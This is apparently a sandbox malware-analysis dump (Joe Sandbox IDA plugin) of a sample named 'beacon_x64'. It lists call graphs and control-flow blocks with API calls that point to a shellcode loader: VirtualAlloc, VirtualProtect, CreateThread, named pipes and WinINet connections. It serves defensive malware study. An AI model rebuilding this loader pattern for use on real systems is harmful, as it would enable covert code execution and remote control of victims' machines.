16897->16898 16898->16896 16899->16903 16900 77e244 free RtlFreeHeap 16901 764631 16900->16901 16902 77e244 free RtlFreeHeap 16901->16902 16902->16903 16903->16887 16904->16900 16906 773e33 16905->16906 16907 773e44 16906->16907 16908 77e244 free RtlFreeHeap 16906->16908 16909 77dba0 16907->16909 16908->16906 16911 77dc2f 16909->16911 16916 77dbba _snprintf _DllMainCRTStartup 16909->16916 16910 77dc40 16913 77dc51 16910->16913 16914 77e244 free RtlFreeHeap 16910->16914 16911->16910 16912 77e244 free RtlFreeHeap 16911->16912 16912->16910 16913->16601 16914->16913 16915 77e244 free RtlFreeHeap 16915->16916 16916->16911 16916->16915 16924 76e118 16917->16924 16919 76e02f WSASocketA 16920 76e051 16919->16920 16921 76e058 WSAIoctl 16919->16921 16920->16538 16922 76e099 closesocket 16921->16922 16922->16920 16925 76e12c 16924->16925 16925->16919 16000 4014c0 16005 401990 16000->16005 16002 4014d6 16009 401180 16002->16009 16004 4014db 16006 4019d0 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 16005->16006 16007 4019b9 16005->16007 16008 401a2b 16006->16008 16007->16002 16008->16002 16010 401460 GetStartupInfoA 16009->16010 16011 4011b4 16009->16011 16017 4013b4 16010->16017 16012 4011e1 Sleep 16011->16012 16015 4011f6 16011->16015 16012->16011 16013 401229 16027 401fd0 16013->16027 16014 40142c _initterm 16014->16013 16015->16013 16015->16014 16015->16017 16017->16004 16018 401251 SetUnhandledExceptionFilter 16047 4024e0 16018->16047 16020 40130e malloc 16022 401335 16020->16022 16023 40137b 16020->16023 16021 40126d 16021->16020 16024 401340 strlen malloc memcpy 16022->16024 16053 403040 16023->16053 16024->16024 16025 401376 16024->16025 16025->16023 16029 402008 16027->16029 16034 401ff2 16027->16034 16028 402240 16028->16034 16041 40223a 16028->16041 16029->16028 16030 4022a8 16029->16030 16032 4021ce 16029->16032 16029->16034 16042 4020b0 16029->16042 16033 401d50 8 API calls 16030->16033 16031 401dc0 8 API calls 16031->16041 16035 40228c 16032->16035 16058 401dc0 16032->16058 16037 4022b4 16033->16037 16034->16018 16088 401d50 16035->16088 16037->16018 16038 402208 16040 401dc0 8 API calls 16038->16040 16040->16041 16041->16028 16041->16031 16041->16035 16042->16032 16042->16035 16042->16038 16043 401dc0 8 API calls 16042->16043 16044 402160 16042->16044 16045 402156 16042->16045 16043->16042 16044->16034 16046 402192 VirtualProtect 16044->16046 16045->16044 16046->16044 16048 4024ef 16047->16048 16050 40251c 16048->16050 16117 402a80 16048->16117 16050->16021 16051 402517 16051->16050 16052 4025c5 RtlAddFunctionTable 16051->16052 16052->16050 16054 40304a 16053->16054 16121 4017f8 GetTickCount 16054->16121 16057 403058 SleepEx 16057->16057 16059 401f64 16058->16059 16060 401de2 16058->16060 16059->16038 16061 401fa2 16060->16061 16062 401e2b 16060->16062 16065 401e90 16060->16065 16063 401fb1 16061->16063 16064 401d50 4 API calls 16061->16064 16066 401e4c VirtualQuery 16062->16066 16067 401d50 4 API calls 16063->16067 16064->16063 16065->16038 16066->16063 16068 401e78 16066->16068 16072 401fcc 16067->16072 16068->16065 16069 401f20 VirtualProtect 16068->16069 16069->16065 16070 401f50 GetLastError 16069->16070 16071 401d50 4 API calls 16070->16071 16071->16059 16073 4022a8 16072->16073 16076 40228c 16072->16076 16077 4021ce 16072->16077 16080 402208 16072->16080 16083 40223a 16072->16083 16084 401dc0 VirtualQuery VirtualProtect GetLastError VirtualProtect 16072->16084 16085 402156 16072->16085 16087 401ff2 16072->16087 16075 401d50 4 API calls 16073->16075 16074 401dc0 4 API calls 16074->16083 16079 4022b4 16075->16079 16081 401d50 4 API calls 16076->16081 16077->16076 16078 401dc0 4 API calls 16077->16078 16078->16080 16079->16038 16082 401dc0 4 API calls 16080->16082 16081->16073 16082->16083 16083->16074 16083->16076 16083->16087 16084->16072 16086 402192 VirtualProtect 16085->16086 16085->16087 16086->16085 16087->16038 16089 401d7d 16088->16089 16090 401fa2 16089->16090 16091 401e2b 16089->16091 16101 401e90 16089->16101 16092 401fb1 16090->16092 16093 401d50 4 API calls 16090->16093 16094 401e4c VirtualQuery 16091->16094 16095 401d50 4 API calls 16092->16095 16093->16092 16094->16092 16096 401e78 16094->16096 16113 401fcc 16095->16113 16097 401f20 VirtualProtect 16096->16097 16096->16101 16099 401f50 GetLastError 16097->16099 16097->16101 16098 401ff2 16098->16030 16100 401d50 4 API calls 16099->16100 16100->16101 16101->16030 16102 4021ce 16107 40228c 16102->16107 16108 401dc0 4 API calls 16102->16108 16103 4022a8 16105 401d50 4 API calls 16103->16105 16104 401dc0 4 API calls 16106 40223a 16104->16106 16109 4022b4 16105->16109 16106->16098 16106->16104 16106->16107 16111 401d50 4 API calls 16107->16111 16110 402208 16108->16110 16109->16030 16112 401dc0 4 API calls 16110->16112 16111->16103 16112->16106 16113->16098 16113->16102 16113->16103 16113->16106 16113->16107 16113->16110 16114 401dc0 VirtualQuery VirtualProtect GetLastError VirtualProtect 16113->16114 16115 402156 16113->16115 16114->16113 16115->16098 16116 402192 VirtualProtect 16115->16116 16116->16115 16119 402a90 16117->16119 16118 402afe 16118->16051 16119->16118 16120 402ae9 strncmp 16119->16120 16120->16118 16120->16119 16122 402e28 16121->16122 16123 401866 CreateThread 16122->16123 16124 4017a6 malloc 16123->16124 16139 4016e6 16123->16139 16125 4017c8 SleepEx 16124->16125 16131 401704 CreateFileA 16125->16131 16128 4017de 16136 401595 VirtualAlloc 16128->16136 16130 4017ed 16130->16057 16132 40179c 16131->16132 16133 40175e 16131->16133 16132->16125 16132->16128 16134 401781 CloseHandle 16133->16134 16135 401762 ReadFile 16133->16135 16134->16132 16135->16133 16135->16134 16137 4015c7 16136->16137 16138 4015e8 VirtualProtect CreateThread 16137->16138 16138->16130 16142 401630 CreateNamedPipeA 16139->16142 16143 4016dc 16142->16143 16144 40168f ConnectNamedPipe 16142->16144 16144->16143 16145 4016a3 16144->16145 16146 4016c6 CloseHandle 16145->16146 16147 4016a7 WriteFile 16145->16147 16146->16143 16147->16146 16148 4016d1 16147->16148 16148->16145 16926 cb0000 16928 cb0021 16926->16928 16927 cb00ce SleepEx 16929 cb00de 16927->16929 16928->16927 16928->16928

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 10 401180-4011ae 11 401460-401463 GetStartupInfoA 10->11 12 4011b4-4011d1 10->12 14 401470-40148a call 402e88 11->14 13 4011e9-4011f4 12->13 15 4011f6-401204 13->15 16 4011d8-4011db 13->16 20 401417-401426 call 402e90 15->20 21 40120a-40120e 15->21 18 401400-401411 16->18 19 4011e1-4011e6 Sleep 16->19 18->20 18->21 19->13 26 401229-40122b 20->26 27 40142c-401447 _initterm 20->27 24 401490-4014a9 call 402e80 21->24 25 401214-401223 21->25 36 4014ae-4014b6 call 402e60 24->36 25->26 25->27 30 401231-40123e 26->30 31 40144d-401452 26->31 27->30 27->31 33 401240-401248 30->33 34 40124c-401299 call 401fd0 SetUnhandledExceptionFilter call 4024e0 call 402ef0 call 401d40 call 402f00 30->34 31->30 33->34 48 4012b2-4012b8 34->48 49 40129b 34->49 51 4012a0-4012a2 48->51 52 4012ba-4012c8 48->52 50 4012f0-4012f6 49->50 56 4012f8-401302 50->56 57 40130e-401333 malloc 50->57 53 4012a4-4012a7 51->53 54 4012e9 51->54 55 4012ae 52->55 58 4012d0-4012d2 53->58 59 4012a9 53->59 54->50 55->48 60 4013f0-4013f5 56->60 61 401308 56->61 62 401335-40133a 57->62 63 40137b-4013af call 401950 call 403040 57->63 58->54 66 4012d4 58->66 59->55 60->61 61->57 64 401340-401374 strlen malloc memcpy 62->64 72 4013b4-4013c2 63->72 64->64 67 401376 64->67 69 4012d8-4012e2 66->69 67->63 69->54 71 4012e4-4012e7 69->71 71->54 71->69 72->36 73 4013c8-4013d0 72->73 73->14 74 4013d6-4013e5 73->74
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
            • String ID: 0PE$@6E$DCE
            • API String ID: 649803965-2430247936
            • Opcode ID: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
            • Instruction ID: 7b6093c48930a8ef89593839c944e9f908a2e32032a5f35aeb8b435f34b377a6
            • Opcode Fuzzy Hash: 51392e7461e9e07ed7f19d0721189c0bf25b9227d41394980ff0e93a3bc1fca1
            • Instruction Fuzzy Hash: 5C71ADB5601B0486EB259F56E89476A33A1B745BCAF84803BEF49673E6DF7CC844C348

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 146 401630-40168d CreateNamedPipeA 147 4016dc-4016e5 146->147 148 40168f-4016a1 ConnectNamedPipe 146->148 148->147 149 4016a3-4016a5 148->149 150 4016c6-4016cf CloseHandle 149->150 151 4016a7-4016c4 WriteFile 149->151 150->147 151->150 152 4016d1-4016da 151->152 152->149
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID: NamedPipe$CloseConnectCreateFileHandleWrite
            • String ID:
            • API String ID: 2239253087-0
            • Opcode ID: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
            • Instruction ID: 33ab9d0585ac1679f1025b945fed68b18b66da774309cd2c41c4043231b0423c
            • Opcode Fuzzy Hash: a137092020d99df8e6f9d9be70b23b42cb61a637a040608a59e494d996c8cf1e
            • Instruction Fuzzy Hash: 431182A1714A5047E7208B12EC4870AB660B785BEAF548635EE5D1BBE4DB7DC445CB08

            Control-flow Graph

            APIs
              • Part of subcall function 00774FEC: malloc.LIBCMT ref: 00775008
            • GetUserNameA.ADVAPI32(?,?,?,?,?,?,?,-00000001,?,-00000001,?,00000002,0076BC89), ref: 00774EAF
            • strrchr.LIBCMT ref: 00774EED
            • _snprintf.LIBCMT ref: 00774F9B
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: NameUser_snprintfmallocstrrchr
            • String ID:
            • API String ID: 1238167203-0
            • Opcode ID: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
            • Instruction ID: acfcf0b2408f82f1970ff836b1577b2b25feed8be8b1a88da89a17859e82d0fa
            • Opcode Fuzzy Hash: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
            • Instruction Fuzzy Hash: B6417030718A484FEB58BB6CA45A67972D2FBC9310B50852DE48FC3296DE78DC468786

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 259 cb0000-cb001f 260 cb0021-cb002f 259->260 261 cb0031-cb0034 260->261 262 cb0036-cb0039 260->262 261->262 263 cb0069-cb0073 261->263 262->260 264 cb003b-cb003c 262->264 266 cb00ce-cb00dc SleepEx 263->266 267 cb0075-cb0076 263->267 265 cb003e-cb0065 264->265 265->265 271 cb0067 265->271 269 cb00de-cb00df 266->269 270 cb0137-cb0138 266->270 268 cb0078-cb007f 267->268 272 cb0081 268->272 273 cb00b7-cb00cc 268->273 274 cb00e1-cb00e8 269->274 275 cb013b-cb0149 270->275 271->260 276 cb0083-cb00b5 272->276 273->266 273->268 277 cb00ea 274->277 278 cb0120-cb0135 274->278 279 cb014b-cb014e 275->279 280 cb0150-cb0153 275->280 276->273 276->276 281 cb00ec-cb011e 277->281 278->270 278->274 279->280 282 cb0183-cb0197 279->282 280->275 283 cb0155-cb0156 280->283 281->278 281->281 284 cb0158-cb017f 283->284 284->284 285 cb0181 284->285 285->275
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.4563882801.0000000000CB0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00CB0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_cb0000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: Sleep
            • String ID:
            • API String ID: 3472027048-0
            • Opcode ID: 88e8bec169d31fc803aeef05fed04f98ffb8ac2501b92b4af572ff67ccb03544
            • Instruction ID: 9edfd09e993379db005e2cd451a7fa2ee2d74b5f3c2cf8424c25b948288ca37c
            • Opcode Fuzzy Hash: 88e8bec169d31fc803aeef05fed04f98ffb8ac2501b92b4af572ff67ccb03544
            • Instruction Fuzzy Hash: 62512330214A498F871DDE1C95C1A36B7D5FB95305B2596ADE5ABCB22BC930EC93CA80

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 305 77c3b8-77c3e9 306 77c3ef-77c406 305->306 307 77c48d-77c490 305->307 308 77c40d-77c410 306->308 309 77c408-77c40b 306->309 310 77c4a6-77c4b3 307->310 311 77c492-77c4a4 307->311 308->307 313 77c412-77c415 308->313 309->308 312 77c417-77c424 309->312 317 77c4bd-77c4d7 310->317 311->317 315 77c426-77c429 312->315 316 77c42b-77c442 312->316 313->307 313->312 318 77c448-77c45d 315->318 316->318 319 77c467-77c47d call 77e0f3 318->319 320 77c45f-77c465 318->320 324 77c482-77c484 319->324 320->324 324->307 325 77c486-77c48b 324->325 325->317
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: aac624e9975941b750356ceb78cd3aa232c6bd2fb96b7d29432793f1a6c54ced
            • Instruction ID: 7878f70bb30bb46caeed817ae11cf8f40daf5e55c535db903da7736341a572bd
            • Opcode Fuzzy Hash: aac624e9975941b750356ceb78cd3aa232c6bd2fb96b7d29432793f1a6c54ced
            • Instruction Fuzzy Hash: 8731693061CB498FDF59DF5CA8A56293BE5F7AC350B10416EE44EC3221CB78EC418B82
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: aae31d7e320f49b2b7b8d2523f04f5552282cf255c9fc24f679e558ee007d563
            • Instruction ID: d2ba47a7aa6781d044900516d1f07da00c9b92082def92b798761cb42449b37d
            • Opcode Fuzzy Hash: aae31d7e320f49b2b7b8d2523f04f5552282cf255c9fc24f679e558ee007d563
            • Instruction Fuzzy Hash: 2731723071CB488F9F96DF9CA89562677E1F7AC340B10456EE44DC3221DB38EC418B86
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 33013136f0bb95f1eb9f3645b418df4a5ff2efb559231014e174e8ee2656166c
            • Instruction ID: 474e96df1a5244b6b548cbe0c62cad31774b50e3e60343505492e5b3e50b3809
            • Opcode Fuzzy Hash: 33013136f0bb95f1eb9f3645b418df4a5ff2efb559231014e174e8ee2656166c
            • Instruction Fuzzy Hash: 7B213D70609B488FDF56DB5CA45872977E5F79C355F10892EE44DC3260CB7C9984CB82

            Control-flow Graph

            APIs
            • malloc.MSVCRT ref: 004017B9
            • SleepEx.KERNELBASE ref: 004017CD
              • Part of subcall function 00401704: CreateFileA.KERNEL32 ref: 0040174D
              • Part of subcall function 00401704: ReadFile.KERNEL32 ref: 00401777
              • Part of subcall function 00401704: CloseHandle.KERNEL32 ref: 00401784
            • GetTickCount.KERNEL32 ref: 004017FC
            • CreateThread.KERNEL32 ref: 00401885
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID: CreateFile$CloseCountHandleReadSleepThreadTickmalloc
            • String ID: @@$%c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$e$i$p$p
            • API String ID: 3660650057-1020837823
            • Opcode ID: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
            • Instruction ID: b345380edbdca45ebb9784712c11a19872ab0759f856dd5cf37371eb7f92d9a3
            • Opcode Fuzzy Hash: 66b9071a1fbc2149318147bf2399a6e6d29a638d527e23c28c2dfbdbcde83963
            • Instruction Fuzzy Hash: 6A11DFB2214A80C7E714CF62FC4575ABBA0F3C478AF44412AEB091B7A8CB7CC545CB08

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 75 76d68c-76d75a call 77e530 * 2 call 7773d0 call 77e63c call 77a454 call 776b38 88 76d790-76d79a 75->88 89 76d75c-76d78b call 771d70 call 771c0c 75->89 90 76d79c-76d7a3 88->90 89->88 90->90 92 76d7a5-76d7b0 90->92 94 76d7c4-76d7d4 call 77e63c 92->94 95 76d7b2-76d7c2 call 77e63c 92->95 100 76d7d9-76d82f call 77a454 call 76d918 94->100 95->100 106 76d831-76d838 100->106 106->106 107 76d83a-76d868 call 7773c4 call 76dfbc 106->107 113 76d895-76d89e 107->113 114 76d86a-76d882 InternetQueryDataAvailable 107->114 120 76d8a0-76d8bb 113->120 114->113 115 76d884-76d88d 114->115 115->113 116 76d88f-76d891 115->116 118 76d893 116->118 119 76d8bc-76d8bf 116->119 118->113 119->113 121 76d8c1-76d8dc 119->121 123 76d8de-76d8e4 121->123 124 76d8ed-76d8f0 121->124 123->124 125 76d8e6-76d8eb 123->125 124->113 126 76d8f2-76d900 InternetCloseHandle call 77a454 124->126 125->121 125->124 128 76d905-76d916 call 77746c 126->128 128->120
            APIs
            • _snprintf.LIBCMT ref: 0076D725
              • Part of subcall function 0077E63C: _errno.LIBCMT ref: 0077E673
              • Part of subcall function 0077E63C: _invalid_parameter_noinfo.LIBCMT ref: 0077E67E
            • _snprintf.LIBCMT ref: 0076D7BD
            • InternetQueryDataAvailable.WININET ref: 0076D87A
              • Part of subcall function 00771D70: strchr.LIBCMT ref: 00771DD6
              • Part of subcall function 00771D70: _snprintf.LIBCMT ref: 00771E0C
              • Part of subcall function 00771C0C: strchr.LIBCMT ref: 00771C69
              • Part of subcall function 00771C0C: _snprintf.LIBCMT ref: 00771CB3
            • _snprintf.LIBCMT ref: 0076D7D4
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: _snprintf$strchr$AvailableDataInternetQuery_errno_invalid_parameter_noinfo
            • String ID:
            • API String ID: 2459009813-0
            • Opcode ID: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
            • Instruction ID: 6d3bfec50e3685198216892558368aa4cab22b6b8de7b5a8f6f69eca99914827
            • Opcode Fuzzy Hash: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
            • Instruction Fuzzy Hash: 4781B831B18B488FDB29EB28D88967AB3E5FB94311F10456EE88BC7151DF78DD018781

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 131 76e014-76e04f call 76e118 WSASocketA 134 76e051-76e053 131->134 135 76e058-76e097 WSAIoctl 131->135 136 76e0f6-76e10a 134->136 137 76e0b4-76e0be 135->137 138 76e099-76e0b1 135->138 139 76e0c0-76e0c1 137->139 140 76e0eb-76e0f4 closesocket 137->140 138->137 141 76e0c5-76e0cf 139->141 140->136 142 76e0d6-76e0e2 141->142 143 76e0d1-76e0d4 141->143 142->140 144 76e0e4 142->144 143->142 145 76e0e6-76e0e7 143->145 144->141 145->140
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: IoctlSocketclosesocket
            • String ID: _Cy
            • API String ID: 3445158922-1085951347
            • Opcode ID: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
            • Instruction ID: 95bc0be9aa1f534fcc7b4e410fba2e1e74f9bd43cf88a8b9a2e1c0882bca5aea
            • Opcode Fuzzy Hash: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
            • Instruction Fuzzy Hash: 3931873461CA488FDB64DF289888666B7E5FBA8355F21463EE88FC3251DB78C5428741

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 199 401595-4015c5 VirtualAlloc 200 4015c7-4015c9 199->200 201 4015e0-40162c call 401563 VirtualProtect CreateThread 200->201 202 4015cb-4015de 200->202 202->200
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID: Virtual$AllocCreateProtectThread
            • String ID:
            • API String ID: 3039780055-0
            • Opcode ID: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
            • Instruction ID: 4860219b4c01c513d172ce07c02c5f666ef61a193e7305fd3c1758593cceafba
            • Opcode Fuzzy Hash: 37a72bd22e1593272b4bf177035eaaf1f4bd0309aa4848ec5ea1f9fd2353670d
            • Instruction Fuzzy Hash: 83012B9231558051E7249B73AC04B9AAA91A38DBC9F48C135FE4B5FB65DA3CC145C308

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 205 787ee0-787ef6 206 787ef8 call 783df0 205->206 207 787efd-787f2d GetModuleFileNameA 205->207 206->207 209 787f2f-787f32 207->209 210 787f34-787f35 207->210 209->210 211 787f37-787f59 call 787fd4 209->211 210->211
            APIs
            • __initmbctable.LIBCMT ref: 00787EF8
              • Part of subcall function 00783DF0: _setmbcp.LIBCMT ref: 00783E02
            • GetModuleFileNameA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00780A4D), ref: 00787F16
            • parse_cmdline.LIBCMT ref: 00787F4E
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: FileModuleName__initmbctable_setmbcpparse_cmdline
            • String ID:
            • API String ID: 2500756167-0
            • Opcode ID: 02a3faf443033822baad9372f6b36ba85e02337a6089eab45ff8ead4e3f179b1
            • Instruction ID: 3ff3fa534ec8f9c9e373ba441b533fc88c6fd90fa152f1274ba915cb112eb96d
            • Opcode Fuzzy Hash: 02a3faf443033822baad9372f6b36ba85e02337a6089eab45ff8ead4e3f179b1
            • Instruction Fuzzy Hash: DA01D63060DB488FEB64EF6C9898326BBE1F799315F10075EE18AC21A0CB78C546C786

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 214 401704-40175c CreateFileA 215 40179c-4017a5 214->215 216 40175e-401760 214->216 217 401781-40178f CloseHandle 216->217 218 401762-40177f ReadFile 216->218 217->215 218->217 219 401791-40179a 218->219 219->216
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd
            Similarity
            • API ID: File$CloseCreateHandleRead
            • String ID:
            • API String ID: 1035965006-0
            • Opcode ID: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
            • Instruction ID: 7b1d3a4e01a1f8e2f055cb9d21318694f184940eaf5a18d2a9f539c7fc6a8346
            • Opcode Fuzzy Hash: d0ade87b55ea1173ce219873fd21c40e70a9c53e42d9cadcd6b17f6b1618b3d2
            • Instruction Fuzzy Hash: 2401D46531461186E7214B52AC04716B6A0B3D4BE9F648339BFA907BD4DB7DC54ACB08

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 220 76da48-76daaf call 77d0fc call 77a464 * 2 227 76dab1 220->227 228 76dab9-76dac8 call 77a464 220->228 227->228 231 76daef-76daff call 77a454 228->231 232 76daca-76dacc 228->232 236 76db01-76db13 InternetOpenA 231->236 234 76dae7-76daed 232->234 235 76dace-76dad0 232->235 234->236 238 76dad2-76dad5 235->238 239 76dae0-76dae5 235->239 240 76db19-76db8a InternetConnectA call 77a464 236->240 238->231 241 76dad7-76dade 238->241 239->236 245 76db8f-76db92 240->245 241->240 246 76db94-76dbe0 call 77a444 call 77a454 call 77a444 call 77a454 245->246 247 76dbe8-76dc02 call 77d12c 245->247 246->247
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd
            Yara matches
            Similarity
            • API ID: Internet$ConnectOpen
            • String ID:
            • API String ID: 2790792615-0
            • Opcode ID: c02896be98f17698b461471e8597e5ae08ffedd86d74317b17a8770a829ca45e
            • Instruction ID: 244b89fc3f3b9261a23c0d605b99ad7398eb0d6a0aad11de3600b9e504bda1e2
            • Opcode Fuzzy Hash: c02896be98f17698b461471e8597e5ae08ffedd86d74317b17a8770a829ca45e
            • Instruction Fuzzy Hash: 3D418F30728B048FEF59EB68D89A72973D6FB88304F11542DE48BC7252DA7C9D06C786

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 286 403040-403051 call 401950 call 4017f8 291 403058-40305f SleepEx 286->291 291->291
            APIs
              • Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
